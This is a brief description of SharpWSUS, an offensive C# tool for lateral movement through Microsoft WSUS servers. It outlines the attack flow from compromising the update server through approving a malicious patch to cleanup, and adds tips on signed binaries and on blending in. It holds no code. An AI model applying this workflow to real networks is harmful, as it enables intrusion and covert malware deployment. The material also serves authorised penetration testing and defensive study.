SharpWSUS: CSharp tool for lateral movement through WSUS
SharpWSUS
SharpWSUS is a CSharp tool for lateral movement through WSUS.
WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.
SharpWSUS is a continuation of this tooling and aims to bring the complete functionality of WSUSPendu and Thunder_Woosus to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.
The flow of using SharpWSUS for lateral movement is as follows:
- Locate the WSUS server and compromise it.
- Enumerate the contents of the WSUS server to determine which machines to target.
- Create a WSUS group.
- Add the target machine to the WSUS group.
- Create a malicious patch.
- Approve the malicious patch for deployment.
- Wait for the client to download the patch.
- Clean up after the patch is downloaded.
Notes
- Binary has to be windows signed, so psexec, msiexec, msbuild, etc could be useful for lateral movement.
- The metadata on the create command is not needed but is useful for blending in to the environment.
- If testing in a lab the first is usually quick, then each subsequent update will take a couple of hours (this is due to how windows evaluate whether an update is installed already or not)
